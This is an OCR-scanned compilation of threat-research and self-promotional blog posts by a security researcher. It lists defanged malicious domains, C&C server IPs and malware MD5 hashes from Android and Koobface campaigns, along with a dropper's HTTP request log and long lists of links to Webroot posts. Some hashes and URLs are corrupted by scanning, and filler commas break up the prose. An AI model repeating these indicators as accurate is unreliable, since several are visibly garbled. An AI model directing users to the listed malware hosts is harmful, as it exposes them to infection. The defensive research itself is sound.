we've, been, monitoring, an, increase, in rogue Google Play, type, 
of, Android, applications, capable, rogue online Web sites, tricking, 
tens, of, thousands, of, users, on, a, daily, basis, into, 

installation, rogue, applications, largely, relying, on, a, 

multi-tude, of, social engineering, vectors. Next, to, rogue, online, 
Web, sites, we’ve, been, also, actively, monitoring, an, increase, 
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in, compromised, Web sites, serving, malicious, software, 
potentially, exposing, the, confidentiality, availability, and, 
integrity, of, their, devices, to, a, multi-tude, of, malicious, 
software. We've, been, also, busy, monitoring, an, increase, in, 
ongoing, monetizing, of, hijacked, traffic, type, of, underground, 
market, traffic, exchanges, with, more, cybercriminals, successfully, 
monetizing, the, hijacked, traffic, while, earning, fraudulent, 
revenue, in the, process. 


In, this, post, we’ll, profile, the, 

malicious, Campaign, provide, actionable, intelligence, on, the, 
infrastructure, behind, it, and, discuss, in-depth, the, tactics, 
techniques, and, procedures, of, the, cybercriminals, behind, it. 


Related malicious MD5s known to have 
participated in the campaign: 


MD5: 288ad03cc9788c0855d446e34c7284ea 


Related malicious URLS known to have 
participated in the campaign: 
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hxxp://brutaltube4mobile.com - 
37.1.200.202 


hxxp://xxxvideotube.org - 5.45.112.27; 
37.140.192.196; 184.82.244.166 


Known to have responded to the same 
malicious C &C server IP (37.1.200.202), are, also, the following 
malicious domains: 


hxxp://nudism-nudist.com 


hxxp://yumail.site 


hxxp://hot-images.xyz 


hxxp://nudism-klub.com 


hxxp://nudism-nudist.com 
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hxxp://family-naturism.org 


hxxp://teen-nudism.com 


hxxp://family-naturism.net 


hxxp://teen-media.net 


hxxp://01hosting.biz 


hxxp://jp-voyeur.com 


hxxp://link-protector. biz 


hxxp://brutaltube4mobile.com 


hxxp://adobeupdate.org 


hxxp://australiamms.com 


hxxp://brutaltube4mobile.com 
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hxxp://donttreadonmike.com 


hxxp://german-torrent.com 


hxxp://fondazion.com 


hxxp://derechosmadre.org 


hxxp://torsearch.net 


hxxp://4mytelecharger55.net 


hxxp://4mytelecharger66.net 


hxxp://fondazion.net 


hxxp://fondazion.org 


hxxp://sevajug.org 
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hxxp://defilez2.net 


hxxp://downloadfrance22.com 


hxxp://derechosmadretierra.org 


Related malicious MD5s, known, to, 
have, phoned, back, to, the, same, C &C server IPs 
(brutaltube4mobile.com - 37.1.200.202): 


MD5: 18327d619484112f81dc7da4169ba088 


MD5: 090f7349fef4e1624393383e145d5982 


MD5: d2e3d9d0e599cfcelaf8b2777c3a071la 


Related malicious MD5s known to have 
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phoned back to the same C &C server IP (xxxvideotube.org - 
5.45.112.27; 37.140.192.196; 184.82.244.166): 


MD5: 288ad03cc9788c0855d446e34c7284ea 


Once executed a sample malware 
phones back to the following C &C server IPs: 


hxxp://5.196.121.148 


Related malicious MD5s known to have 
phoned back to the same C &C server IP (5.196.121.148): 


MD5: 7beflc5eOdcf5f6fd152c0723993e378 


MD5: 10e6c3f050b24583abf708d6afb34db2 


MD5: 5a122660a3d54d9221500224f103d7b0 
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Thanks, to, the, overall, availability, 

of, mobile, affiliate, network, type, of, monetization, vectors, we, 
expect, to, continue, observing, an, increase, in, mobile, malware, 
type, of, fraudulent, and, rogue, Web sites, serving, malicious, 
software, to, unsuspecting, users, internationally. 


We'll, continue, monitoring, the, 


market, segment, for, mobile, malware, and, post, updated, as, soon, 
as, new, developments, take, place. 


13.4.2 Project Proposal - Cybercrime Research - Seeking Investment 
(2017-11-15 14:23) 


[1] 
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Dear blog readers, I’m currently seeking an investment regarding a cybercrime research 


project with the project proposal available on request. 


Approach me at dancho.danchev@hush.com 


1. https://2.bp. blogspot .com/-sfhQhqB6cTk/Wh2vJSInQhI/AAAAAAAAHKA/D5iBFRTgLbMPSgdPeNF8PWPbKqO0S51ARgCLcBGAs/s1 


600/Misc_01. png 


13.4.3 Book Proposal - Seeking Sponsorship - Publisher Contact (2017-11-15 14:23) 
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By Dancho Danchev 


The adventurous and fancyful life of a Bulgarian hacker in the 90's caught 
between the mussings of the security industry and the Intelligence 
Community pursuing his own personal goals leading to a blissful career as a 
renewed secutity expert for a international foundation 


Dear blog readers, as I’m currently busy writing a book, I’m currently seeking a publisher 
contact, with the book proposal available on request. 


Approach me at ddanchev@cryptogroup.net 
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2018 


14,1 January 


14.1.1 Dissecting the Latest Koobface Facebook Campaign (2018-01-20 05:56) 
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# Result — Protocol Host URL Body  Content-T... 
[9] in) 200 HTTP us.geocities.com jadanbates84findex.htm 1,020 text/htrl 
$) 1 200 HTTP wwiw.geocities.com /js_source/puSgeo. js 998 application)... 
[@) 2 200 HTTP us.adserver,yahoo.com j/a?f=76001548&p=geocit.., 155 text/html; c... 
$) 3 200 HTTP us.geocities.com /js_source/geoyvck08. js 1,448  application/... 
214 us.geocities.com fadanbates84/index.htm?... text/html 
|e) 5 200 HTTP us.geocities.com /js_source/tab04.html 929 text/html 
[@) 6 200 HTTP us.geocities.com /js_source/adframeO?. html 939 text/html 
=) ? 200 HTTP us.il.yimg.com fus.yimg.comfi/us/smbiz/e... 942 = image/gif 
=) 8 200 HTTP us.il.yimg.com fus.yimng.comfi/us/smbiz/e... 943 image/aif 
$3) 9 200 HTTP us.il.yimg.com jus. yima.comyi{me/mce. js 242 = applications... 
lostart. info 38  application/... 
$) 11 200 HTTP us.il.yimg.com jus. y¥img.com/si{me/mcl1.js 98  application/... 
{9} 12 200 HTTP themis.geocities.yahoo.com /themis{h.php?curl=http:/... 1,680 text/html; c... 
$) 13 200 HTTP us.il.yimg.com jus. y¥ima.comfi{me/mc2. js 2,140 = application/... 
im) 14 200 HTTP us.i1.yimg.com  fus.yimg.comsifus/smbiz/b... 1,293 image/gif 
5 off34.com {go/fb.php 9 text/html 
$) 16 200 HTTP themis.geocities.yahoo.com /themisfovad01.js 302 = application)... 
$) 17 200 HTTP us.js2.yimg.com fus.js.yimg.com/lib/smbjjs... 374 = application}... 
d youtube-go.com 10,476 text/html 
™) 19 200 HTTP us.il.vimg.com  fus.yimg.comfi/us/smallbiz... 0 = image/aif 
|e) 20 200 HTTP youtube-go.com /?ch=ea= 0 text/html 
[@} 21 200 HTTP youtube-go.com /?ch=kea= 10,476 text/html 
22 304 HTTP youtube-go.com /player.js 0 
S23 304 HTTP tl.extreme-dm.com —_fi.gif 0 
i) 24 200 HTTP youtube-go.com } 10,476 text/html 
2a 304 HTTP youtube-go.com /player.swf?pid=6123 0 
©) 26 200 ~=HTTP e2.extreme-dm.com /s11.g?login=leded&jv=y... 43 image/aif 


2? 304 HTTP youtube-go.com /tom.jpg 1) 


youtube-go.com jflash_update.exe 0 application)... 


The latest [1]Koobface malware campaign at Facebook, is once again exposing a diverse 
ecosystem worth assessing in times of active migration to alternative ISPs tolerating or 
conveniently ignoring the malicious activities courtesy of their customers. The - now removed 
- binaries that the dropper was requesting were hosted at the American International Baseball 
Club in Vienna, indicating a compromise. 


us.geocities .com/adanbates84/index.htm 

lostart .info/js/js.js (79.132.211.51) 

off34 .com/go/fb.php (79.132.211.51) 

youtube-spyvideo .com/youtube _file.html (58.241.255.37) 

ahdirz .com/moviel.php?id=638 &n=teen (208.85.181.69) 
top100clipz .com/m6/moviel.php?id=638 &n=teen (208.85.181.67) 


hq-vidz .com/moviel.php?id=638 &n=teen (208.85.181.68) 
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The dropper then phones back home to : 071108 .com/fb/first.php (79.132.211.50) with the 
binaries hosted at a legitimate site that’s been compromised : 


aibcvienna.org/youtube/ bnsetup24.exe 


aibcvienna.org/youtube/ tinyproxy.exe 
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Related fake Youtube domains participating : 
catshof .com (79.132.211.51) 

youtube-spy .info (94.102.60.119) 
youtubehof .net (218.93.205.30) 
youtube-spyvideo .com (58.241.255.37) 
yyyaaaahhhhoooo.ocom .pl (67.15.104.83) 


youtube-x-files .com (94.102.60.119) 


The development of cybercrime platforms utilizing legitimate infrastructure only, has al- 
ways been in the works. With spamming systems relying exclusively on the automatically 
registered email accounts at free web based providers, to the automatic bulk registration of 
hundreds of thousands of domains enjoying a particular domain registrar’s weak anti-abuse 
policies, it would be interesting to monitor whether [2]marginal thinking or [3]improved OPSEC 
relying on compromised hosts will be favored in 2009. 


Related posts: 

[4]Fake YouTube Site Serving Flash Exploits 
[5]Facebook Malware Campaigns Rotating Tactics 
[6]Phishing Campaign Spreading Across Facebook 


[7]Large Scale MySpace Phishing Attack 


[8]Update on the MySpace Phishing Campaign 


[9]MySpace Phishers Now Targeting Facebook 


[10]MySpace Hosting MySpace Phishing Profiles 


1. http: //blogs.zdnet .com/security/?p=2146 
2. http: //www.renesys.com/blog/2008/09/internet_vigilantism_1.shtm 
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3. 
4 

5. 

6. 

7. 

8. 

9 
10, 


14.1.2 Introduction to Dancho Danchev’s Infowar Monitor 2.0 (2018-01-23 13:10) 
Dear blog readers it’s been quite some time since | last posted a quality update following 
[1]my dissapearance in 2010. | wanted to express my gratitude to everyone who participated 


in the search including colleagues and companies and wanted to say thanks for taking your 
time and effort to keep track and follow my research and disappearance. 


Disruptive 
Individuals 


As I’ve been busy working on Dancho Danchev’s Blog - Mind Streams of Information Security 
Knowledge Infowar Monitor 2.0 | wanted to let you know that I’ve recently resumed my [2]Twit- 
ter account following a successful career at [3]Webroot Inc. including a short-term venture 
at [4]GroupSense following a successful launch of my own company called [5]Disruptive 
Individuals and [6]Threat Data - the World’s Most Comprehensive Threats Database including 
the [7]Obmonix Platform - The World’s Most Comprehensive Sensor Network, including a 
[8]possible book writing project including a successful [9]cyber security consultancy and a 
possible [LO]career opportunity request. 


Let’s take the time and effort to elaborate on what exactly InfoWar Monitor 2.0 aims to 
achieve including a detailed explanation of some of the key features of the newly launched 
portal-based type of research-based Information Security and Cybercrime Research and Threat 
Intelligence gathering community. Users interested in contributing with content including 
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blog contribution including partnership sponsorship and possible advertising requests can 
approach me at dancho.danchev@hush.com 


01. What is Inforwar Monitor 2.0? 

Inforwar Monitor 2.0 aims to build the World’s largest and most comprehensive commu- 
nity for Information Security, threat intelligence gathering and cybercrime research. Managed 
and operated by Dancho Danchev the World’s leading expert in Information Security and 


cybercrime research and threat intelligence gathering the community seeks to provide infor- 
mation data and knowledge to thousands of users globally. 


Among the key features include: 

- [11]Daily Security News Coverage 
- [12]Information Security Videos 

- [13]Security and Hacking eBook 

- [14]Security Newsletter 

- [15]Information Security Podcast 
- [16]Security and Hacking E-Zine 

- [17]Security Mailing List 

- [18]Daily Intelligence Brief 


- [19]Closed Security Community 


02. What is Disruptive Individuals? 


Disruptive Individuals is a research-intensive data-driven company successfully establish- 
ing the world’s largest snapshot of malicious cybercrime activity for the purpose of offering 
the industry the world’s most versatile portfolio of malicious cybercrime-driven services 
successfully positioning itself as the world’s leading provider of real-time intelligence-driven 
services and product portfolio including cybercrime-research data malicious activity profiling 
services and custom-tailored intelligence assessments successfully positioning the company 
as the world’s leading provider of cybercrime-data driven research-intensive intelligence 
data-driven company. 
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What is the Obmonix Sensor Network? 


The Obmonix platform aims to build the World's most versatile and comprehensive sensor network for 
intercepting monitoring and responding to cybercrime and cyber jihad events successfully deploying a variety of 
proprietary sensor network based of honeypot appliances industry-wide partnership including the utilization of 
proprietary cybercrime and cyber jihad forum and community monitoring and infiltration campaigns successfully 
positioning the platform as the leading indicator for cybercrime and cyber jihad activity globally empowering the 
operator law enforcement and the security industry with then necessary tactics techniques and procedures 
(TTPs) for successfully responding and monitoring cybercrime and cyber jihad activity globally leading to 
successful launch of the Disruptive Individuals startup successfully serving the needs of the Intelligence 
Community, the security industry and law enforcement agencies globally successfully anticipating an emerging 
set of malicious and fraudulent tactics techniques and procedures successfully protecting millions of users 
globally 


03. What is the Obmonix Platform? 


The Obmonix platform aims to build the [20]World’s most versatile and comprehensive 
sensor network for intercepting monitoring and responding to cybercrime and cyber jihad 
events successfully deploying a variety of proprietary sensor network based of honeypot appli- 
ances industry-wide partnership including the utilization of proprietary cybercrime and cyber 
jinad forum and community monitoring and infiltration campaigns successfully positioning the 
platform as the leading indicator for cybercrime and cyber jihad activity globally empowering 
the operator law enforcement and the security industry with then necessary tactics techniques 
and procedures (TTPs) for successfully responding and monitoring cybercrime and cyber jihad 
activity globally leading to successful launch of the Disruptive Individuals startup successfully 
serving the needs of the Intelligence Community, the security industry and law enforcement 
agencies globally successfully anticipating an emerging set of malicious and fraudulent tactics 
techniques and procedures successfully protecting millions of users globally. 


5595 


04. What is Threat Data? 
Threat Data is the industry’s leading and most versatile JSON-capable threats database 
successfully empowering companies and security researchers with the necessary knowledge 


to stay ahead of current and emerging threats, further, positioning their company and enter- 
prise on the top of its game. 


- Russian Business Network coverage 

- Koobface Botnet coverage 

- Kneber Botnet coverage 

- Hundreds of IOCs (Indicators of Compromise) 

- Tactics Techniques and Procedures In-Depth Coverage 

- Malicious and fraudulent infrastructure mapped and exposed 
- Malicious and fraudulent Blackhat SEO coverage 

- Malicious spam and phishing campaigns 

- Malicious and fraudulent scareware campaigns 

- Malicious and fraudulent money mule recruitment scams 

- Malicious and fraudulent reshipping mule recruitment scams 
- Web based mass attack compromise fraudulent and malicious campaigns 


- Malicious and fraudulent client-side exploits serving campaigns 


Potential users and clients interested in obtaining access to Threat Data including a pos- 
sible trial and a sample can approach me at dancho.danchev@hush.com 


Stay tuned! 


1. ft tpe1//Adanchev. blogepot,con/2017/11/Aancho-danchevs-2010-disappoarance.htal 
2. hetps://ewitter.con/dancho_danchev 

3. https: //www.webroot .com/blog/author/webroot-blog-staff/page/7/ 

4. netps://eroupsense. 10/ 
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. http: //ddanchev.blogspot .com/2017/11/book-proposal-seeking- sponsorship .htm 
. http: //ddanchev.blogspot.com/2017/05/threat-intelligence-adaptive-approach. htm 
10. http://ddanchev. blogspot .com/2017/11/ddanchev-is-for-hire.htm 


_hetps: //edanchev blogspot .con/p/secursty-nevs heal 
 fepe://adanchev blogspot .con/p/eecurity- videos nel 

_ https: //edanchev blogspot .con/2017 /14/oook- proposal seeling- sponsorship. Hal 
"https: //edanchev blogspot .co/p/secursty-podcest tal 

eps: //adanchev blogspot .con/p/eecurieuy teal 


ttps://ddanchev.blogspot.com/p/security-mailing-list .htm 
ttps://ddanchev.blogspot.com/p/d.htm 


ttps://ddanchev.blogspot.com/2017/05/invitation-to-join-security-community.htm 


ttps://www.indiegogo.com/projects/the-world-s-most-comprehensive-sensor-network-securit 


14.2 May 


14.2.1 Security News - Safe Browsing protection from even more deceptive attacks 
- Commentary (2018-05-14 12:58) 


Google’s security 

initiatives, continue, indicating, the search engine market’s leader, 
ambitions, towards, building, a vibrant, ecosystem, for, protecting, 
end users, from malicious attacks, and, further, position, the 
company, as, an emerging, leader, whose, activities, contribute, to 
the, overall security level, of the entire ecosystem. 


[1]External Link: 


Safe 

Browsing has been protecting over one billion people from traditional 
phishing attacks on the web for more than eight years. The threat 
landscape is constantly changing—bad actors on the web are using 
more and different types of deceptive behavior to trick you into 
performing actions that you didn’t intend or want, so we’ve 
expanded protection to include social engineering. 
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The latest, 

indication, of this, trend, is the company’s, introduction, of, 

social engineering attack, warnings, fully capable, of preventing, 
widespread damage, and to prevent, a malicious attack, from taking, 
place, in the early stages, of the campaign. With malicious actors, 
continuing, to utilize, visual social engineering campaigns, to 

serve, malicious software, and potentially unwanted applications, 
compromising, the confidentiality, integrity, and, availability, of information, 
visual social engineering, will, continue, to represent, a growing 
attack vector, to be utilized, by malicious actors, that, needs, 

better, protective, mechanisms, on behalf, of ecosystem participants. 


This post has been reproduced from [2]Dancho Danchev’s blog. Follow him [3]Jon 
Twitter. 


1. https: //googleonlinesecurity. blogspot .bg/2015/11/safe-browsing-protection-from-even-more.htm 


2. http: //ddanchev. blogspot .com/ 
3. https://twitter.com/dancho_danche 


14.2.2 Summarizing Webroot’s Threat Blog Posts for January - 2012 (2018-05-22 14:27) 


WEBROOT 


In this post I’ll summarize Webroot Threat Blog Posts for January, 2012. Feel free to check out 
some of the latest research published at the blog here and consider subscribing to its RSS 
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feed. 


01. [1]Cybercriminals generate malicious Java applets using DIY tools 

02. [2]A peek inside the uBot malware bot 

03. [3]Researchers intercept a client-side exploits serving malware campaign 
04. [4]How phishers launch phishing attacks 

05. [5]A peek inside the Umbra malware loader 

06. [6]How malware authors evade antivirus detection 


07. [7]lnside AnonJDB - a Java based malware distribution platforms for drive-by down- 
loads 


08. [8]Zappos.com hacked, 24 million users affected 

09. [9]lnside a clickjacking/likejacking scam distribution platform for Facebook 
10. [10]A peek inside the Cythosia v2 DDoS Bot 

11. [11]A peek inside the PickPocket Botnet 

12. [12]Mass SQL injection attack affects over 200,000 URLs 


13. [13]Email hacking for hire going mainstream 


14. [14]Millions of harvested emails offered for sale 


4. https: //www.webroot .com/blog/2012/01/23/how-phishers-launch-phishing-attacks/ 

5. https: //www.webroot.com/blog/2012/01/20/a-peek-inside-the-umbra-malware-loader/ 

6. https: //www. webroot .com/blog/2012/01/18/how-malware-authors-evade-antivirus-detection/ 
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rive-by-downloads/ 


8. https://www.webroot .com/blog/2012/01/17/inside-anonjdb-a- java-based-malware-distribution-platforms-for- 


rive-by-downloads/ 


9. ttps://www.webroot .com/blog/2012/01/13/inside-a-clickjackinglikejacking-scam-distribution-platform-for- 


10. https: //www.webroot .com/blog/2012/01/09/a-peek-inside-the-cythosia-v2-ddos-bot/ 


11. https: //www.webroot .com/blog/2012/01/06/a-peek- inside-the-pickpocket-botnet/ 


12. https: //www.webroot .com/blog/2012/01/05/mass-sql-injection-attack-affects-over-200000-urls/ 


13. https: //www.webroot .com/blog/2012/01/05/email-hacking-for-hire-going-mainstream/ 
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. https://www.webroot.com/blog/2012/01/03/millions-of-harvested-emails-offered-for-sale/ 


14.2.3. Dancho Danchev’s Blog Going Private - Request Access (2018-05-24 19:53) 


Dear blog readers, it’s been several years since | last posted a quality update following my 
disappearance in 2010. | wanted to take the time and thank everyone including researchers 
and colleagues who participated in the search including colleagues and vendors who offered 
expertise and advice including possible career opportunity. 


As I’ve recently launched InfoWar Monitor 2.0 | decided that the time has come for me 
to take my blog to a new level by offering proprietary invite-only commercial access to 
selected readers who request access. The access guarantees unlimited access to daily 
cybercrime research information security topics coverage including an unlimited supply of 
actionable threat intelligence research on a daily basis including access to InfoWar Monitor 
2.0 security podcast subscription security mailing list security newsletter a closed security 
community and a hacker E-zine released by the community including unlimited access to 
proprietary research reports and articles. 


How to request access? 


Users interested in requesting access can approach me with the following details: 


Name: 
Position: 
How long have you been reading my blog? 


How much would you be willing to invest to obtain access on a monthly basis? 


| can be reached at dancho.danchev@hush.com 


Enjoy! 
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14.3 July 


14.3.1 Seeking Investor Contact! (2018-07-24 23:20) 


Dear blog readers, I’m currently seeking a investor contact regarding an upcoming security 
project and wanted to find out whether you might be aware of an investor that would be willing 
to invest in my upcoming security project? 


| can be reached at dancho.danchev@hush.com 


14.3.2 Historical OSINT - Summarizing 2 Years of Webroot’s Threat Blog Posts Re- 
search (2018-07-28 21:00) 


WEBROOT 


SecureAnywhere' 


It’s been several years since | last posted a quality update at the industry’s leading threat- 
intelligence gathering [1]Webroot’s Threat Blog following a successful career as lead security 
blogger and threat-intelligence analyst throughout 2012-2014. 


In this post I’ll summarize two years worth of Webroot’s Threat Blog research with the 
idea to provide readers with the necessary data information and knowledge to stay ahead of 
current and emerging threats. 


01. January - 2012 
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¢ [2]Cybercriminals generate malicious Java applets using DIY tools 

¢ [3]A peek inside the uBot malware bot 

¢ [4]Researchers intercept a client-side exploits serving malware campaign 

¢ [5]How phishers launch phishing attacks 

¢ [6]JA peek inside the Umbra malware loader 

¢ [7]How malware authors evade antivirus detection 

¢ [8]Inside AnonJDB - a Java based malware distribution platforms for drive-by downloads 
¢ [9]Zappos.com hacked, 24 million users affected 

¢ [10]Inside a clickjacking/likejacking scam distribution platform for Facebook 
¢ [11]A peek inside the Cythosia v2 DDoS Bot 

¢ [12]A peek inside the PickPocket Botnet 

¢ [13]Mass SQL injection attack affects over 200,000 URLs 

¢ [14]Email hacking for hire going mainstream 


¢ [15]Millions of harvested emails offered for sale 


02. February - 2012 


¢ [16]Research: Google’s reCAPTCHA under fire 


¢ [17]Spamvertised ‘You have 1 lost message on Facebook’ campaign leads to pharmaceu- 
tical scams 


¢ [18]A peek inside the Smoke Malware Loader 

¢ [19]Researchers spot Citadel, a ZeuS crimeware variant 

¢ [20]Researchers intercept two client-side exploits serving malware campaigns 
¢ [21]Pharmaceutical scammers launch their own Web contest 

¢ [22]The United Nations hacked, Team Poison claims responsibility 

¢ [23]Report: Internet Explorer 9 leads in socially-engineered malware protection 
¢ [24]Twitter adds HTTPS support by default 

¢ [25]Spamvertised “Hallmark ecard” campaign leads to malware 

¢ [26]Report: 3,325 % increase in malware targeting the Android OS 

¢ [27]Why relying on antivirus signatures is simply not enough anymore 


¢ [28]Researchers intercept malvertising campaign using Yahoo’s ad network 
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¢ [29]A peek inside the Ann Malware Loader 


¢ [30]Spamvertised ‘Termination of your CPA license’ campaign serving client-side exploits 


[31]How cybercriminals monetize malware-infected hosts 


¢ [32]A peek inside the Elite Malware Loader 


[33]BlackHole exploit kits gets updated with new features 


03. March - 2012 


¢ [34]New service converts malware-infected hosts into anonymization proxies 


¢ [35]Spamvertised ‘Temporary Limit Access To Your Account’ emails lead to Citi phishing 
emails 


¢ [36]A peek inside the Darkness (Optima) DDoS Bot 


¢ [37]Research: proper screening could have prevented 67 % of abusive domain registra- 
tions 


¢ [38]Spamvertised ‘Your accountant license can be revoked’ emails lead to client-side ex- 
ploits and malware 


¢ [39]Spamvertised ‘Google Pharmacy’ themed emails lead to pharmaceutical scams 
¢ [40]Research: U.S accounts for 72 % of fraudulent pharmaceutical orders 


¢ [41]Millions of harvested U.S government and U.S military email addresses offered for 
sale 


¢ [42]Trojan Downloaders actively utilizing Dropbox for malware distribution 


¢ [43]Spamvertised ‘Your tax return appeal is declined’ emails serving client-side exploits 
and malware 


¢ [44]Malicious USPS-themed emails circulating in the wild 
¢ [45]Spamvertised LinkedIn notifications serving client-side exploits and malware 
¢ [46]Tens of thousands of web sites affected in ongoing mass SQL injection attack 


¢ [47]Spamvertised Verizon-themed ‘Your Bill Is Now Available’ emails lead to ZeuS crime- 
ware 


¢ [48]Spamvertised ‘Scan from a Hewlett-Packard Scanjet’ emails lead to client-side exploits 
and malware 


04. April - 2012 
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[49]Email hacking for hire going mainstream - part two 
[50]Spamvertised ‘US Airways’ themed emails serving client-side exploits and malware 
[51]New underground service offers access to hundreds of hacked PCs 


[52]New DIY email harvester released in the wild 


05. May - 2012 


[53]Managed SMS spamming services going mainstream 
[54]A peek inside a boutique cybercrime-friendly E-shop 
[55]Cybercriminals release ‘Sweet Orange’ - new web malware exploitation kit 


[56]Spamvertised ‘Pizzeria Order Details’ themed campaign serving client-side exploits 
and malware 


[57]Poison Ivy trojan spreading across Skype 
[58]A peek inside a managed spam service 


[59]Ongoing ‘LinkedIn Invitation’ themed campaign serving client-side exploits and mal- 
ware 


[60]Spamvertised bogus online casino themed emails serving adware 


[61]Spamvertised ‘YouTube Video Approved’ and ‘Twitter Support” themed emails lead to 
pharmaceutical scams 


[62]A peek inside a boutique cybercrime-friendly E-shop - part two 
[63]Spamvertised CareerBuilder themed emails serving client-side exploits and malware 
[64]Pop-ups at popular torrent trackers serving W32/Casonline adware 


[65]‘Windstream bill’ themed emails serving client-side exploits and malware 


06. June - 2012 


[66]Cybercriminals infiltrate the music industry by offering full newly released albums for 
just $1 


[67]A peek inside a boutique cybercrime-friendly E-shop - part three 


[68]DDoS for hire services offering to ‘take down your competitor’s web sites’ going main- 
stream 


[69]Skype propagating Trojan targets Syrian activists 
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¢ [70]Spamvertised ‘UPS Delivery Notification’ emails serving client-side exploits and mal- 
ware 


¢ [71]Spamvertised ‘DHL Package delivery report’ emails serving malware 


¢ [72]Spamvertised ‘Your Amazon.com order confirmation’ emails serving client-side ex- 
ploits and malware 


¢ [73]Cybercriminals populate Scribd with bogus adult content, spread malware using Co- 
modo Backup 


¢ [74]Spamvertised ‘Your Paypal Ebay.com payment’ emails serving client-side exploits and 
malware 


¢ [75]‘Create a Cartoon of You” ads serving MyWebSearch toolbar 


¢ [76]Spamvertised ‘Your UPS delivery tracking’ emails serving client-side exploits and mal- 
ware 


¢ [77]Spamvertised ‘Confirm PayPal account” notifications lead to phishing sites 
¢ [78]Spamvertised ‘DHL Express Parcel Tracking Notification’ emails serving malware 


¢ [79]Spamvertised bogus online casino themed emails serving W32/Casonline 


07. July - 2012 


¢ [80]Cybercriminals launch managed SMS flooding services 
¢ [81]117,000 unique U.S visitors offered for malware conversion 
¢ [82]Phishing campaign targeting Gmail, Yahoo, AOL and Hotmail spotted in the wild 


¢ [83]What’s the underground market’s going rate for a thousand U.S based malware in- 
fected hosts? 


¢ [84]Spamvertised American Airlines themed emails lead to Black Hole exploit kit 
¢ [85]Online dating scam campaign currently circulating in the wild 
¢ [86]New Russian service sells access to compromised social networking accounts 


¢ [87]Cybercriminals impersonate UPS in client-side exploits and malware serving spam 
campaign 


¢ [88]Russian Ask.fm spamming tool spotted in the wild 
¢ [89]Spamvertised Intuit themed emails lead to Black Hole exploit kit 


¢ [90]Cybercriminals impersonate Booking.com, serve malware using bogus ‘Hotel Reser- 
vation Confirmation’ themed emails 


¢ [91]Spamvertised Craigslist themed emails lead to Black Hole exploit kit 
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[92]Cybercriminals impersonate law enforcement, spamvertise malware-serving ‘Speed- 
ing Ticket’ themed emails 


[93]Spamvertised ‘Download your USPS Label’ themed emails serve malware 


[94]Cybercriminals target Twitter, spread thousands of exploits and malware serving 
tweets 


[95]Russian spammers release Skype spamming tool 


[96]Spamvertised ‘Your Ebay funds are cleared’ themed emails lead to Black Hole exploit 
kit 


08. August - 2012 


[97]Spamvertised AICPA themed emails lead to Black Hole exploit kit 


[98]Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole 
exploit kit 


[99]Ongoing spam campaign impersonates LinkedIn, serves exploits and malware 
[100]Millions of spamvertised emails lead to W32/Casonline 

[101]Cybercriminals impersonate AT &T’s Billing Service, serve exploits and malware 
[102]IRS themed spam campaign leads to Black Hole exploit kit 

[103]Cybercriminals spamvertise bogus greeting cards, serve exploits and malware 


[104]Spamvertised ‘Federal Tax Payment Rejected’ themed emails lead to Black Hole ex- 
ploit kit 


[105]Spamvertised ‘Fwd: Scan from a Hewlett-Packard Scanjet’ emails lead to Black Hole 
exploit kit 


[106]Spamvertised ‘Royal Mail Shipping Advisory’ themed emails serve malware 


[107]Cybercriminals impersonate Intuit Market, mass mail millions of exploits and mal- 
ware serving emails 


[108]Cybercriminals spamvertise PayPay themed ‘Notification of payment received’ 
emails, serve malware 


[109]Cybercriminals impersonate UPS, serve malware 


09. September - 2012 


[110]Spamvertised ‘Wire Transfer Confirmation’ themed emails lead to Black Hole exploit 
kit 
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[111]Intuit themed ‘QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit 


¢ [112]Cybercriminals resume spamvertising bogus greeeting cards, serve exploits and mal- 
ware 


¢ [113]Cybercriminals abuse Skype’s SMS sending feature, release DIY SMS flooders 
¢ [114]New Russian service sells access to thousands of automatically registered accounts 


¢ [115]Spamvertised ‘Your Fedex invoice is ready to be paid now’ themed emails lead to 
Black Hole Exploit kit 


¢ [116]New Russian DIY SMS flooder using ICQ’s SMS sending feature spotted in the wild 


¢ [117]Spamvertised ‘US Airways reservation confirmation’ themed emails serve exploits 
and malware 


¢ [118]Cybercriminals impersonate FDIC, serve client-side exploits and malware 
¢ [119]Managed Ransomware-as-a-Service spotted in the wild 

¢ [120]A peek inside a boutique cybercrime-friendly E-shop - part four 

¢ [121]New E-shop selling stolen credit cards data spotted in the wild 

¢ [122]From Russia with iPhone selling affiliate networks 


¢ [123]New Russian DIY DDoS bot spotted in the wild 


10. October - 2012 


¢ [124]New Russian DIY DDoS bot spotted in the wild 

¢ [125]Recently launched E-shop sells access to hundreds of hacked PayPal accounts 
¢ [126]New Russian service sells access to compromised Steam accounts 

¢ [127]‘Vodafone Europe: Your Account Balance’ themed emails serve malware 

¢ [128]Cybercriminals impersonate UPS, serve client-side exploits and malware 

¢ [129]‘Your video may have illegal content’ themed emails serve malware 


¢ [130]Cybercriminals spamvertise ‘Amazon Shipping Confirmation’ themed emails, serve 
client-side exploits and malware 


¢ [131]American Airlines themed emails lead to the Black Hole Exploit Kit 

¢ [132]Bogus Facebook notifications lead to malware 

¢ [133]Spamvertised ‘KLM E-ticket’ themed emails serve malware 

¢ [134]‘Intuit Payroll Confirmation inquiry’ themed emails lead to the Black Hole exploit kit 


¢ [135]Malware campaign spreading via Facebook direct messages spotted in the wild 
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[136]‘Regarding your Friendster password’ themed emails lead to Black Hole exploit kit 
[137]Russian cybercriminals release new DIY DDoS malware loader 

[138]PayPal ‘Notification of payment received’ themed emails serve malware 
[139]Cybercriminals impersonate Delta Airlines, serve malware 

[140]‘Your UPS Invoice is Ready’ themed emails serve malware 

[141]Bogus Skype ‘Password successfully changed’ notifications lead to malware 
[142]Cybercriminals impersonate Verizon Wireless, serve client-side exploits and malware 
[143]Spamvertised ‘BT Business Direct Order’ themed emails lead to malware 


[144]Cybercriminals spamvertise millions of British Airways themed e-ticket receipts, 
serve malware 


[145]Cybercriminals spamvertise millions of bogus Facebook notifications, serve malware 


[146]Nuclear Exploit Pack goes 2.0 


11. November - 2012 


5608 


[147]BofA ‘Online Banking Passcode Reset’ themed emails serve client-side exploits and 
malware 


[148]‘ADP Immediate Notification’ themed emails lead to Black Hole Exploit Kit 
[149]USPS ‘Postal Notification’ themed emails lead to malware 
[150]‘Fwd: Scan from a Xerox W. Pro’ themed emails lead to Black Hole Exploit Kit 


[151]‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits 
and malware 


[152]‘Payroll Account Holded by Intuit’ themed emails lead to Black Hole Exploit Kit 


[153]‘American Express Alert: Your Transaction is Aborted’ themed emails serve client- 
side exploits and malware 


